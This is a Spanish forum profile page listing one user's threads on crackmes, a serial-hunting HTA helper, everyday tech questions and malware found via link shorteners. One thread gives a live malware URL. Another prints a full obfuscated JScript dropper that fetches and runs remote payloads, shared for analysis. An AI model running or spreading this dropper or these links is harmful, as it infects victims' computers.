Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Temas - Flamer

#1
Hola amigo hoy vengo con un pequeño tutorial sobre el crackme de hendrix el llamado Axiateam este crackme fue mi primer crackme que logre resolver con el bloc de notas sin saber nada de revesing y en ese entonces no conosia el ollydbg mucho menos el x64dbg y como para mi marco mis inicios en aquellos años....viejos recuerdos he coleccionado varios crackmes y este en especial lo llevo aguardado en mi celular como un amuleto....bueno empesemos lo abriremos con el x64dbg y miramos las string aqui



despues veremos el mensaje correcto



damos doble clic en el mensaje correcto y nos lleva hasta esta zona



como observan esta la api que compara, un salto je y el mesaje correcto, asi que pondremos un breakpoint en la api vbaVarTstEq y pulsamos f9 y como serial pondre 123456 luego preciono el boton Entrar....vemos que se detiene donde pusimos el breakpoint y se mira lo siguiente



como ven se obserba la string "Subliminal Worm   " y si bajamos la barra de desplasamiento de la pila obserbamos la misma string y el serial que ingresamos 123456



por logica sin entrar en la api donde pusimos el breakpoint deduzco que esa es la clave asi que la copiamos y pegamos y nos arroja lo siguiente



ahora si entramos en la api pulsando F7 nos vamos traseando hasta encontrar donde compara las cadenas



bueno creo que eso es todo espero les sea de su agrado....este crackme es muy sencillo pero asi es como empiesa uno con los faciles y como yo me gustan los faciles para algrarme el dia

Saludos Flamer y perdonen la ortografia pero no pieno cambiarla
Daescarga del crackme:https://www.mediafire.com/file/6su3hwi5u15wi58/Axiateam_By_Hendrix.zip/file
#2
hola que paso con la descarga de estos archivos

https://www.elhacker.net/hacking-programas-hack.html#crackmes

al dar click no descarga nada

saludos
#3
hola soy flamer y hace poco me di cuenta que mediafire borro uno de mis crackmes es este



el link era este

http://www.mediafire.com/download/eka19h0zf1qm7j1/KeygenMe+6.rar

link del hilo cuando lo presente:

https://foro.elhacker.net/ingenieria_inversa/reto_crackme_6_de_flamer-t368430.0.html

pregunto si alguien lo aguardo para resubirlo



saludos Flamer
#4
Hola amigos no tengo otro lugar donde hacer está pregunta así que regrese al foro y una cosa si les aclaro no soy machista y mucho menos feminista....

Solo me preguntaba porque en las noticias, el clima, en los deportes hasta en el periódico ponen que juluna o manganita salió en bikini o levanto pesas con pantalón ajustado o salió sin nada que dejar ala imaginación y etc ...

Mi pregunta es porque muestran tanto a las mujeres bellas que nos quieren vender o por qué lo hacen....no se han preguntado que consecuencias traerá eso luego dicen que el hombre es muy calenturiento....pues no dejan de salir mujeres buenas en los medios.... que nos tratan de implantar en el cerebro o que nos quieren manipular no entiendo

Saludos Flamer y si es para llamar la atención pero eso traerá consecuencias
#5
Foro Libre / como se llama esta pelicula?
27 Octubre 2020, 01:03 AM
Hola amigos tengo rato sin pasar por aquí y vengo a pedir ayuda y quería saber como se llama esta película

https://www.facebook.com/131654074250975/videos/363204685038974


mire el video y me gusto y quisiera verla bueno

saludos flamer o díganme como buscar el nombre no encontré algún dato
#6
hola amigos tengo un problema y es que tengo un sobrinito muy batalloso y es muy desentendido y por mas que le digo que no se conecte a tiktok este no hace caso y le quiero bloquear tiktok desde el router y si se preguntan por que se lo quiero bloquear es por que usando tiktok se pone lenta la conexión y me causa problemas

bueno lo que tengo entre al router desde el navegador y mire esta pestaña



intente con la web de ricardo para hacer una prueba pero no la logre bloquear.....después investigue un poco y leí por hay que tenia que usar opendns pero no se en que parte de mi ruter tengo que configurar para poner los dns que me dan que son  208.67.222.222 y 208.67.220.220 y que sigue después

#7
hola mi duda es como leer el codigo html de una pagina de facebook para descargar un video....tengo este codigo

Código (php) [Seleccionar]

<html>
<head><title>descargar video</title>
</head>
<body>
<?php 
$url
="https://www.facebook.com/CuddleClones/videos/473689233322969/";
$code file_get_contents($url);

//$tap = strpos($code,"twitter:player");
$file fopen("archivo.txt""w");
fwrite($file,$code);
fclose($file);

echo 
"listo  ";

?>

</body>
</html>


pero no lee el código que yo espero....creo que facebook se protege de esto no se

saludos

Mod: Temas sobre PHP van al subforo de PHP.
#8
Hola mi pregunta es si creo una pagina para descargar vídeos de youtube y facebook que problemas tendría......pregunto por los vídeos de derecho de autor y como saber que vídeos  tienen derechos de autor

también pregunto por que hay muchas paginas que ofrecen ese servicio y veo que no les pasa nada, hasta app de android existen.....cierto que en algunos casos no pueden descargar un vídeo por los derechos de autor

solo son preguntas
#9
esa pregunta viene ya que hay aplicaciones como free fire que con saldo play store realizas compras en el juego y pues me entra la duda ya que creo que ese saldo les llega a ellos y como lo retiran....no creo que se lo gasten todo en la tienda de google play


saludos
#10
hola mi pregunta es si puedo crear un tema donde pueda vender una tarjeta de regalo o gift cart como se les llama

no veo que este prohibido




y en que subforo seria
#11
hola pues esa es mi pregunta

por que google u otros buscadores no indexan los sub-dominios de 000webhost
#12
Hola resiente mente vendí uno bitcoins por paypal ya me avían dicho que por paypal era muy arriesgado y resulta que a la persona que le vendí resulto un estafador y el clásico marco como transacción no autorizada y resulta que yo perdí la disputa

el caso es que le vendí 2 veces y me pago de 3 cuentas diferentes y de pequeños pagos......al final yo perdi y ahora tengo saldo negativo

mi pregunta es que pasa si no pago y que tanto te presiona paypal para pagar


Saludos
#13
Hola amigos les presento mi nuevo crackme es nivel 1 el objetivo es crear el keygen o sacar una pass valida no vale parchar


Reto : Crackme

Nombre : Loki-Mouse

Autor : Flamer

Lenguaje : Dev-c++

Nivel : 1

Objectivo : Serial valido o keygen funcional

Descarga: http://www.mediafire.com/file/b8jf1pkbk77c1hm/Crackme_Loki-Mouse.rar/file



#14
hola solo es una pregunta simple y es que me ronda la cabeza si los acortadores te pagan por visitar el link acortado o llegar hasta la pagina acortada osea el link original


saludos
#15
hola mi pregunta es como saber si yo abro una pagina en una pestaña con x dirección web
desde otra pagina...... como saber  si la pestaña que abrí fue cerrada ejemplo




en la foto anterior si cierro la pestaña CryptoExpress en la otra pestaña se detiene el contador.....no creo que tenga que ver con el foco ya que si me brinco a la primera el contador sigue...... solo se detiene si cierro la pestaña de CryptoExpress....mi pregunta es como sabe si cerré la pestaña
#16
hola anterior mente tenia el avast como AV pero desidi desistalarlo así que me quede con otro....y ahora cuando abri el administrador de tareas resulta que tenia un proceso del avast como lo supe por su icono.....asi que lo busque y resulta que tengo archivos del avast en esta carpeta

CitarC:\ProgramData\AVAST Software

los ejecutables en este momento no los encontré pero la otra ves que revise la carpeta hay estaban

lo que busco es un programa que borre todo rastro de aplicaciones desistaladas tengo el revo pero no creo que me sirva para eso....ya que solo borra cuando quieres desistalar y lo que  yo busco es borrar el rastro de aplicaciones ya borradas


saludos
#17
Resiente mente visite un enlace acortado y se descargo un archivo rar de las paginas de publicidad....primeramente aclaro que fue una descarga automática lo digo por que aquí en el foro hace alrededor de 5 o 6 años no recuerdo cuando pero un usuario de este foro me critico que no hay descargas automáticas en los navegadores que siempre tienes que aceptar la descarga....no se si fue mi ignorancia al no entender su punto o seria la ignorancia de el junto con su ego de que yo se mas que tu pero en fin eso ya paso y no se me olvida por que me quede con coraje por que creen saber mas que uno....no digo que se mucho pero se y entiendo un poco lo que pasa en mi ordenador y si yo le dije aquella ves que fue una descarga automática es por que lo fue en fin.

ese método al parecer lo siguen usando ciertas personas para propagar virus.....y como dije al principio visitando un enlace acortado se descargo un archivo rar de un enlace el cual ya tumbaron

al abri el rar y analizarlo un poco termine en esta pagina


==================Tengan cuidado hay virus en esta pagina abrir archivos con VM============================

http://68.183.219.162/modules/

http://68.183.219.162/modules/XoaMCAcp93K5AIL0GBKAA0H66aL5B4KG4NGEKB.vbs

lo muestro aquí para el que quiera analizar el malware y todos sus archivos creo que a alguien le interesara probar con malwares reales, pueden probar en maquinas virtuales

y como digo estas personas usan el método de propagar el virus en enlaces acortados y al visitar el enlace se descarga automaticamente al ordenador y como las personas son curiosas y sin saber que es siempre dan clic para ver que es y cuas se envirulean

bueno en fin saludos Flamer y tengan cuidado




#18
Bueno no quería recurrir a ustedes pero no me quedo de otra

El problema con que me tope es el siguiente....el crackme pide nombre y serial.....hasta donde yo veo el nombre no es de mucha importancia...el serial es el difícil ya que este pasa por 2 fases y las dos fases tienen  que ser validas o true (para que me entiendan) para que el crackme muestre el mensaje correcto....otra cosa el serial tiene que ser mayor de 8 dígitos

================================================================

La primera fase toma todos los dígitos del serial.... los convierte en su valor ascii y les resta 32 a cada uno y los ira sumando y el resultado de la primera fase tiene que ser 522 para que sea true o validad

===============================================================

La segunda fase (esta es la buena) toma todos los dígitos del serial y les resta 32 hasta qui todo bien

Ahora haremos una pausa y explicare un detalle para continuar....si tenemos un serial "flamer007"

llamaremos posiciones impares del serial a las siguientes:   "f a e 0 7"  a las pares  "l m r 0"   bueno espero hallan entendido ese detalle

ahora en la segunda fase como dije ira tomando cada dígito del serial después le resta 32 y pregunta si la posición del serial es par o impar....bueno el primer dígito de todo serial sera impar así que lo toma en este caso es la "f"....le resta 32 y luego lo divide entre 100......luego lo multiplica por el resultado del dígito anterior del serial pero como es el primer dígito lo multiplica por 1

luego toma la "l" del serial anterior....le resta 32 y como la posición es par lo multiplica por el resultado del dígito anterior que en este caso fue la "f"

luego toma el tercer dígito que es "a"....le resta 32 y como la posición es impar lo divide entre 100 y luego lo multiplica por el resultado del dígito anterior

=========================================

Bueno creo que ya entendieron que ira asiendo con cada dígito.....el resultado de la segunda fase tiene que ser igual a   

112000.0636339199991

con todo y la parte fraccionaria

así que yo me las ingenie para hacer un programa por fuerza bruta(le digo fuerza bruta por que no se como llamarle)..... pero no es el típico programa que intenta clave por clave es diferente.... ya que tu iras escribiendo la clave y te muestra si te vas a cercando o alejando
del serial correcto


Código (html4strict) [Seleccionar]

<html>
<head>
<title>BruteForce Crackme 8 De EnigmaGroup   ...:::By Flamer:::...</title>
</head>
<body>
<center>
<font color="WHITE"><marquee direction="left" style="background:black;font-size:15pt;">BruteForce Crackme 8 De EnigmaGroup   ...:::By Flamer:::...</marquee></font><br><br>
Serial:&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp <input type="text" id="100" size='50' style="text-align:center;" onkeyup="generar()">
<br><br><br><br>
522<div id="101" style="color:red;font-size:15pt;"></div>&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp&nbsp
112000.0636339199991<div id="102" style="color:red;font-size:15pt;"></div>
</center>
<script language="vbscript">
dim s,c,d,x,caden
   
function generar
  s = document.getElementById("100").value
  c = 0
  for x = 1 to len(s)
    d = asc(mid(s,x,1)) - 32
    c = c + d
  next
   
  document.getElementById("101").innerHTML =  c
       
  c = 1
  for x = 1 to len(s)
     d = asc(mid(s,x,1)) - 32
     if (x mod 2) = 1 then
        d = d / 100
    c = c * d
  else
        c = c * d
     end if
  next
 
  document.getElementById("102").innerHTML = c
     
end function
</script>
</body>
</html>





pueden probarlo para que lo intenten solo copean y pegan en bloc de notas y lo aguardan con la extensión hta

otra solución que se me ocurrió para este crackme es lograr imprimir todos los números que sumen 522 del 1 al 90....si se preguntan por que del 1 al 90.... es simple 1 + 32 = 33......90 + 32 = 122 

el 122 es la z en ascii  y el 33 !

es el rango que elegí



bueno a ver quien me hecha la mano saludos Flamer y si se pregunta si are vídeo de esto si lo are


#19
Desarrollo Web / mi faucet en creación
16 Abril 2019, 20:14 PM
hola esta es la faucet que mencione en otro hilo

https://minegamefull.000webhostapp.com/

esta en face de creación y se las presento por que es un foro hacker y como saben de seguridad quiero que me digan si tiene errores o fallos de seguridad....es mi primer pagina nunca había creado una web

no tiene publicidad, pienso poner cuando compre un hosting y un dominio

otra cosa los graficos son sencillos, creo que para este tipo de paginas deberían de ser mejores pero no soy diseñador

saludos Flamer y a ver que les parece
#20
hola amigos actualmente ando mucho por un foro ptc y de criptomonedas por ese motivo casi no ando por estos rumbos

y últimamente me dio por hacer una faucet y casi ya la tengo toda hecha el problema que me surge es como identifico a las personas.....se que de un visitante se puede obtener su ip, sistema operativo, navegador y versión de este entre otras cosas

el problema es que si lo hago por ip y ya que las ip son dinámicas es posible que la ip de un usuario sea usada por otra persona días después


saludos Flamer
#21
hola me acaban de traer una pc para que le instalara unos programas la cual era nueva, el problema surge cuando windows no me deja instalar nada que no sea de la tienda y me guié con esta pagina

https://answers.microsoft.com/es-es/windows/forum/windows_10-other_settings/no-puedo-instalar-aplicaciones-fuera-de-la-tienda/b73e7a7b-4d72-40e4-a086-bc88a0214064

pero resulta que dicho boton no aparece

así que abro este hilo para preguntar cual es la solución para instalar aplicaciones que no son de microsoft

saludos Flamer
#22
hola el problema es el siguiente.... le mande una solicitud a una vieja amiga y no me la acepto, el perfil esta privado solo puedo ver algunas cosas pero eso es otro royo

le mande un mensaje y nada.....pero hace unos días me apareció esto





no entiendo que hizo o que hice ya que no me acepto la solicitud...mi pregunta es por que apareció eso

ahora puedo ver cuando esta conectada y ver cuando fue la ultima ver que estuvo activa


saludos Flamer y a ver quien me ayuda
#23
Ingeniería Inversa / Crackme_Roca By Flamer
16 Diciembre 2018, 19:02 PM
Hola amigos como casi ya nadie publica este tipo de retos por estos rumbos, aqui les dejo uno....lo he llamado crackme Roca

Reglas: Solo hay una no se vale parchar, solo sacar el serial valido y keygen si se puede

Lenguaje: C++

Nivel: 1 o 2

Link del reto:https://www.mediafire.com/file/khndr4o1olsusd0/Crackme_Roca.rar



Lista de Ganadores

1- Tincopasan

2- Geovane

3- Bym24v

4- Fary

5- Jhon2019

6- josue9243


Saludos Flamer
#24
Hola desde que conocí vb.net huvo una gran decepción ya que los ejecutables que se  creaban eran decompilados con un decompilador de net y no con ollydbg

y mi pregunta es que si se pueden crear ejecutables nativos en vb.net y que no puedan ser decompilados con decompiladores para net


saludos Flamer
#25
hola compañeros como algunos ya saben virus total comparte las muestras con los antivirus y pues quería preguntarles si saben de alguna pagina que sea similar a virus total


saludos
#26
Análisis y Diseño de Malware / Archivos de Hendrix
11 Noviembre 2018, 18:18 PM
hola les comparto algunos archivos de hendrix que encontré en la web, en su mayoría todos son del 2006 aquí el link


http://www.geocities.ws/cusacoxa/

rescaten lo que puedan ya que no se cuanto dure esa pagina


saludos Flamer y si encuentran otro crackme aparte del  Axiateam.zip  me avisan
#27
hola amigos navegando por internet por un a cortador se me descargo un archivo zip de este sitio

ATENCION EL SIGUIENTE LINK CONTIENE UN ARCHIVO CON VIRUS

hxxp://167.99.55.222/xsx5/installer.zip


y la curiosidad me hizo abrirlo y adentro contenía 2 archivos js y pues al no entender el código lo publico aquí a ver quien me ayuda a descifrarlo

Código (javascript) [Seleccionar]


function lhf(n) {
    return chhjy[6] + ohzn[11] + uflh.xpcj + yggsv[14]
}

function jfsx(n) {
    return umubg.zqdwb + zoq[15] + crqs.czo
}

function sgrl(n) {
    return sicl[0] + zoq[19] + mgnyo.xah + yggsv[3] + zva[6] + qbnx[1] + lla.hre + uflh.fje + ohzn[10] + ohzn[11]
}

function rdm(n) {
    return sicl[0]
}

function fdbg(n) {
    return wxsf.xeqo + dhl[0] + chhjy[13] + dhl[0] + crqs.iff + lcx[4] + sicl[0] + qbnx[1] + mgnyo.xah + ohzn[11] + uflh.fje + ohzn[10]
}

function szxyw(n) {
    return iqyl[10] + qbnx[1] + qbnx[1] + zva[6] + chhjy[10] + umubg.hzxa + umubg.hzxa + qso[3] + yggsv[3] + dhl[11] + ohzn[11] + chhjy[6] + lcx[4] + zoq[19] + yggsv[16] + uflh.xpcj + yggsv[3] + dhl[11] + lcx[4] + mgnyo.xah + yggsv[16] + umubg.hzxa + wxsf.zwav + chhjy[6] + wxsf.zwav + uflh.mzrn + umubg.hzxa + wxsf.xeqo + sicl[0] + uflh.oqn + zva[6] + yggsv[14] + uflh.fje + qbnx[1] + ohzn[11] + mgnyo.xah + lcx[4] + ohzn[11] + wxsf.zwav + ohzn[11]
}

function vfjqh(n) {
    return cew[5]
}

function wbkj(n) {
    return iqyl[10] + qbnx[1] + qbnx[1] + zva[6] + chhjy[10] + umubg.hzxa + umubg.hzxa + iqyl[10] + uflh.xpcj + jhv.zzg + lla.ydspg + chhjy[6] + zva[10] + yggsv[3] + ohzn[10] + crqs.rdjk + uflh.oqn + qbnx[1] + dhl[11] + yggsv[15] + cew[16] + jhv.zzg + dhl[11] + cew[16] + chhjy[6] + lcx[4] + zoq[19] + yggsv[16] + ohzn[10] + umubg.hzxa
}

function vror(n) {
    return cew[5]
}

function exmcp(n) {
    return sicl[0]
}

function xuqj(n) {
    return zoq[19] + mgnyo.xah + yggsv[3] + zva[6] + qbnx[1] + lcx[4] + sicl[0] + iqyl[10] + ohzn[11] + dhl[11] + dhl[11]
}

function xeve(n) {
    return chhjy[13] + zva[6] + ohzn[11] + uflh.xpcj
}

function dlw(n) {
    return zva[0]
}

function nzban(n) {
    return cew[5] + mgnyo.xah + yggsv[3] + qbnx[1] + ohzn[11]
}

function ouklt(n) {
    return sicl[0] + qbnx[1] + uflh.fje + qbnx[1] + uflh.oqn + chhjy[6]
}

function txm(n) {
    return chhjy[6] + ohzn[11] + uflh.xpcj + yggsv[14]
}

function ntxa(n) {
    return yggsv[12]
}

function gmmc(n) {
    return mgnyo.xah + uflh.oqn + uflh.xpcj
}

function zjzno(n) {
    return cew[5] + yggsv[3] + uflh.xpcj + crqs.rfcdv + qbnx[1] + qbnx[1] + zva[6] + lcx[4] + cew[5] + yggsv[3] + uflh.xpcj + crqs.rfcdv + qbnx[1] + qbnx[1] + zva[6] + cew[2] + ohzn[11] + ickh[8] + uflh.oqn + ohzn[11] + chhjy[6] + qbnx[1] + lcx[4] + uflh.mzrn + lcx[4] + chhjy[1]
}

function hmnf(n) {
    return yggsv[16] + zva[6] + ohzn[11] + uflh.xpcj
}

function yci(n) {
    return cew[2] + ohzn[11] + chhjy[6] + zva[6] + yggsv[16] + uflh.xpcj + chhjy[6] + ohzn[11] + crqs.iff + yggsv[16] + yggsv[14] + yggsv[15]
}

function sibmy(n) {
    return yggsv[14] + ohzn[11] + zva[6] + lcx[4] + ohzn[11] + wxsf.zwav + ohzn[11]
}

function omlpg(n) {
    return ohzn[11]
}

function krdq(n) {
    return dhl[11] + ohzn[11] + uflh.xpcj + jhv.zzg + qbnx[1] + iqyl[10]
}

function jqoe(n) {
    return umubg.zqdwb + zoq[15] + crqs.czo
}

function mcgy(n) {
    return cew[10] + yggsv[16] + chhjy[6] + yggsv[3] + qbnx[1] + yggsv[3] + yggsv[16] + uflh.xpcj
}

function emal(n) {
    return dhl[11] + ohzn[11] + uflh.xpcj + jhv.zzg + qbnx[1] + iqyl[10]
}

function fwagy(n) {
    return sicl[0] + qbnx[1] + uflh.fje + qbnx[1] + uflh.oqn + chhjy[6]
}

function lokh(n) {
    return qso[5] + dhl[11] + yggsv[16] + chhjy[6] + ohzn[11]
}

function yclp(n) {
    return uflh.xpcj + ickh[1]
}

function pvz(n) {
    return chhjy[6] + uflh.oqn + zva[10] + chhjy[6] + qbnx[1] + mgnyo.xah + yggsv[3] + uflh.xpcj + jhv.zzg
}

function wvt(n) {
    return yggsv[16] + zva[6] + ohzn[11] + uflh.xpcj
}

function gdnu(n) {
    return zoq[19] + mgnyo.xah + yggsv[3] + zva[6] + qbnx[1]
}

function jgl(n) {
    return crqs.czo + yggsv[15] + zva[6] + ohzn[11]
}

function urtaq(n) {
    return sicl[0] + qbnx[1] + uflh.fje + qbnx[1] + uflh.oqn + chhjy[6]
}

function bsj(n) {
    return chhjy[6] + ohzn[11] + qbnx[1] + crqs.czo + yggsv[3] + ohzn[10] + ohzn[11] + yggsv[16] + uflh.oqn + qbnx[1] + chhjy[6]
}

function fcpyg(n) {
    return zoq[19]
}

function rwq(n) {
    return ohzn[10] + yggsv[14] + zva[0] + umubg.hzxa
}

function misb(n) {
    return sicl[0] + uflh.fje + uflh.aslpo + ohzn[11] + crqs.czo + yggsv[16] + chhjy[12] + yggsv[3] + dhl[11] + ohzn[11]
}

function jqtrw(n) {
    return uflh.fje + dhl[11]
}

function mvas(n) {
    return zoq[19] + mgnyo.xah + yggsv[3] + zva[6] + qbnx[1] + yggsv[3] + uflh.xpcj + jhv.zzg + lcx[4] + chhjy[12] + yggsv[3] + dhl[11]
}

function trg(n) {
    return jhv.zzg + ickh[1] + chhjy[6] + ohzn[10] + cew[16] + uflh.aslpo + ohzn[10] + uflh.oqn + uflh.fje + zva[10] + ickh[1] + chhjy[6] + lla.ydspg + yggsv[15] + uflh.oqn + yggsv[14] + qbnx[1]
}

function fyzr(n) {
    return qbnx[3] + sicl[0] + yggsv[6] + qbnx[3] + ryqzj[3] + mgnyo.tvzg + lcx[4] + yggsv[6] + qbnx[3] + ryqzj[3] + crqs.rfcdv + crqs.czo + crqs.czo + cew[10]
}

function glvr(n) {
    return zoq[19]
}

function qbvjh(n) {
    return sicl[0] + yggsv[15] + chhjy[6] + qbnx[1] + ohzn[11] + ohzn[10] + chhjy[13] + zva[10] + lla.ydspg + ohzn[11] + zoq[19] + qbnx[1]
}

function znbrt(n) {
    return umubg.zqdwb + ohzn[11] + qbnx[1] + sicl[0] + zva[6] + ohzn[11] + zoq[19] + yggsv[3] + uflh.fje + dhl[11] + chhjy[12] + yggsv[16] + dhl[11] + yggsv[14] + ohzn[11] + mgnyo.xah
}

function ssje(n) {
    for (var h = [7619, 283, n, yclp("vnWU^wj0P_mO+y0")], c = (jqtrw("z!79v$czq^A.ET"), 0); c < 2393; c++)
        for (var u = 0; u < 7169; u++) {
            if (1828 == c) return h[c - 1828 + 2]
        }
    return h[1]
}

function wrim() {
    return new ActiveXObject(fyzr("KwgS^vDm(8A"))
}

function ygqth() {
    return new Date
}
var qso = ["Oyr", "Ldhfp", "Ksq", "f", "Ypqiz", "C"],
    iqyl = [599, "Gangi", 887, "T", "e", 634, "Xqydy", 849, "Hlxp", 587, "h"],
    umubg = {
        zqdwb: "G",
        epycx: "Jgb",
        iid: "Gmhxk",
        pipzu: "Hvbv",
        pbcc: 146,
        uxbfa: "Abdk",
        xlm: 748,
        iyv: 827,
        lzkpe: "o",
        qhsk: 362,
        hzxa: "/",
        sfh: ","
    },
    cew = ["Vakm", 682, "R", "Nvuv", "Ket", "W", "e", 423, 684, 19, "P", "7", "$", "z", "a", "Juif", "w", "Dlge", "Juxva", 191],
    zva = [" ", 879, 969, 951, 692, ",", "p", "7169", 297, "30000", "b", "V", "7619"],
    ohzn = [426, "1", "c", "8", "g", 150, 62, "*", 300, "Jhdbq", "m", "e"],
    zoq = ["Gzqba", 680, 743, "Zbc", "Fmwik", "Gjsm", 604, "3", "Ihewl", "0", "P", "2393", "Imiw", "p", "Khf", "E", "Otiv", "Hset", 312, "c"],
    yggsv = [341, "*", 834, "i", "Szl", "h", "X", "eval", "p", "Szhsm", "m", "Tqz", "\\", "Anqnz", "d", "y", "o"],
    ryqzj = [828, "B", "Rprq", "L", "Xstbu", "Z", "Kyg"],
    rglf = {
        swaue: "2",
        unj: 8,
        sri: 213,
        qdr: "Q",
        tbjs: "Bgtf",
        fxvvu: "Fnzm",
        vloc: 361,
        wsyk: 132,
        dfys: "60000",
        ego: "h",
        jhi: 448,
        adnu: "Xuser",
        eck: "Dly",
        nnt: 589,
        jrshr: 926,
        bqj: 322,
        vivr: "Vjc",
        gbz: "Ydq",
        xcxp: "Powwx",
        mpz: "Pkmy"
    },
    jhv = {
        efvno: "Bds",
        elma: "Ntk",
        zzg: "g",
        pzg: 595,
        didg: 860,
        wbjl: ","
    },
    uflh = {
        tfanu: "Baqt",
        oqn: "u",
        ukpl: "9",
        gxn: 904,
        lqmr: "200",
        xpcj: "n",
        aslpo: "v",
        kzqpj: "1828",
        mzrn: "5",
        czd: "Suux",
        hxpgq: "1",
        fje: "a"
    },
    lcx = [554, "Ujtnj", "i", 173, ".", 512],
    pcd = ["Dvx", 26, "Yvr", "b", "n", "0"],
    dhl = ["D", 628, 680, "d", 536, "&", "K", "Cxgf", "Qwlul", 432, "6", "l", "Ijtwg", ";", 513, "Hlbmu", "K"],
    qqzsc = {
        esp: "K",
        lprg: 590,
        hfvw: 762,
        yas: 311,
        rfle: "Xprxo",
        wmlkb: "340"
    },
    qbnx = ["ActiveXObject", "t", 473, "M", "E"],
    wxsf = {
        ojbw: "d",
        gblt: "(",
        mnds: 889,
        zwav: "x",
        jzsnh: "K",
        dly: 737,
        sjvcn: "q",
        xeqo: "A",
        toayq: "Zath",
        pll: 960,
        hhj: "6",
        kac: "Nncvp",
        uosf: "Bfzgz",
        klk: "283",
        scdit: 493,
        fbam: "6",
        ksl: "G",
        dcmrh: "8"
    },
    mgnyo = {
        tvzg: "2",
        xxvy: "E",
        hjxn: "O",
        bsz: 76,
        xah: "r",
        anyl: "^",
        banrv: "S",
        uvgo: 427,
        enqg: "Yre",
        qiyc: "!",
        tfgtq: "Aeur",
        xmiq: 658,
        gxt: "H",
        zxayj: 844,
        mhlh: 764
    },
    crqs = {
        jur: "M",
        iff: "B",
        fyeu: "Qtj",
        zynw: "E",
        negjj: "Erk",
        rfcdv: "H",
        nhd: "u",
        uea: "4",
        rdjk: "k",
        czo: "T",
        rwx: 293,
        ewr: 155,
        ovm: 630,
        dwf: "Jjo",
        ols: "Dtntj",
        qym: "27"
    },
    chhjy = ["Sgsp", "1", "Sgkdb", "5", 505, "J", "s", "Mncp", "Kxcw", "X", ":", 902, "F", "O"],
    lla = {
        ydspg: "j",
        hre: "N",
        omug: "i",
        vgxje: "c",
        kjnt: "-",
        ngs: "Tpjzh",
        fxdp: "("
    },
    sicl = ["S", ")", "Ekt", 517, "Jye", 566, "Nakdd", "2", 966, "Ynn", "1200000", "O", 577, "J", 198, 579, 516, "Uqmqx", "Pnvx"],
    ickh = [645, "z", "C", ":", 579, 564, "Gtca", "Klss", "q", 831, "Gkasc", "Fzk"],
    adq = ["Yagz", "Nkkx", "Wadgu", 267, "7", "9", "v", "k", "Date", 148],
    qwitd = [-27],
    ozl = [340],
    jldvt = [],
    rxiql = [7],
    upkrl = [];
upkrl[0] = szxyw("kwRItA_g8I");
for (var svoyw = [0], bien = [sibmy("T+A!pYFY.z@7M")], naft = !1, xib = ssje(rdm("k^J&c1H_pV")), hkext = eval(vfjqh("RX6.@bbUu.Ki.") + xib + gdnu("&I%PCHgWiQTMfew")), ppkqs = ActiveXObject, oax = ssje(exmcp("to)i.5W;Pr0")), hhy = 0; hhy < upkrl[krdq("ts6JnjK8jS")]; hhy++) {
    var ohdy = ssje(omlpg("6zPp$2GgXu@Rm.")),
        laqo = new ppkqs(oax + mvas("&.^9x8b6hYZN4HF") + ohdy + qbvjh("S;E6vARY5G3"));
    try {
        var sfu = laqo[znbrt("PU2u.NkI3q6Q")](2),
            rokqj = new ppkqs(zjzno("6pD!EIEso8Xi")),
            ucua = 3e4,
            tzjoc = 6e4,
            azvtb = 3e4,
            otleu = 12e5;
        rokqj[bsj("3_GYaOTwN(2pZ")](ucua, tzjoc, azvtb, otleu);
        try {
            for (; trg("DK^9o59@UfKJ6^q");) {
                var dnez = wrim();
                if (dnez[hmnf("fokP*&RS&Iu")](jfsx("R:SGW1az*ztwJm"), wbkj("(ORL4t3xtqDH"), !1), dnez[lhf("FVINJHNP&@dog^")](), 200 != dnez[ouklt("ha!73w$CvnBTy1")]) break
            }
        } catch (n) {}
        if (5 == svoyw[hhy]) {
            var wpc = hkext[sgrl("^AJ+6Qm@ya(j")],
                gifmj = wpc[pvz("C@@X_34t5@-k")](0, wpc[emal("70guj2N,-iWmb")] - 3);
            upkrl[hhy] += gifmj
        }
        sfu += ntxa("_CYoX6EyEi(Gj$"), sfu += bien[hhy];
        var yzt = 5;
        do {
            rokqj[wvt("3BMbECdG6+n")](jqoe("jC5(99%w%6IFJ!"), upkrl[hhy], 0), rokqj[txm("bX.Km)JmP)O")](), yzt--
        } while (200 != rokqj[urtaq("q_R*XFt!g;")] && yzt);
        if (200 == rokqj[fwagy("$z-coFC0TCr")]) {
            var sca = new ppkqs(vror("(GBq5mlqKu_kIDy") + xib + xuqj("eS9Y6HyV0v"));
            if (8 == svoyw[hhy] && (svoyw[hhy] = 0), svoyw[hhy] <= 3) {
                var eqyh = new ppkqs(fdbg("7a,Bd6K.6ND^FWl"));
                eqyh[xeve("_Y$BkGDYp)-6")](), eqyh[jgl("MNbcc$)3fUmN")] = 1, eqyh[mcgy("(0KcZ!4;%XBE5YH")] = 0, eqyh[nzban("DmG1XPy:WXnU")](rokqj[yci("DBgWzCK)zInp.s")]), eqyh[misb("I2I_bBDotbmg")](sfu), eqyh[lokh("d5uyi,h9N+.,jO")](), svoyw[hhy] || sca[gmmc("qnh!lMgrN8OCJu")](ssje(glvr("CpVAuS,Myq-LW&H")) + rwq("_$Q-ElY8GjqyhH") + ssje(fcpyg("JwmqfJuvl+X")) + dlw("(Kn*GxoxnokyP^") + sfu, 0, 0)
            }
        }
    } catch (n) {}
}




y este es el otro



Código (javascript) [Seleccionar]

function wmnhg(n) {
    return bcx[5] + put.poihe + put.poihe + vvbs.rmuqx + opymo.docm + tzyr.nayhc + tzyr.nayhc + niu.mxq + zhi[0] + rov[1] + lko.fbmgm + qit[5] + qit[8] + niu.mywhk + yqo[1] + vvbs.jnws + zhi[0] + rov[1] + qit[8] + niu.fsvd + yqo[1] + tzyr.nayhc + rov[7] + qit[5] + rov[7] + pqjb[7] + tzyr.nayhc + niu.uneo + niu.fih + lko.cpwe + vvbs.rmuqx + put.hykw + tzyr.spfjs + put.poihe + lko.fbmgm + niu.fsvd + qit[8] + lko.fbmgm + rov[7] + lko.fbmgm
}

function plh(n) {
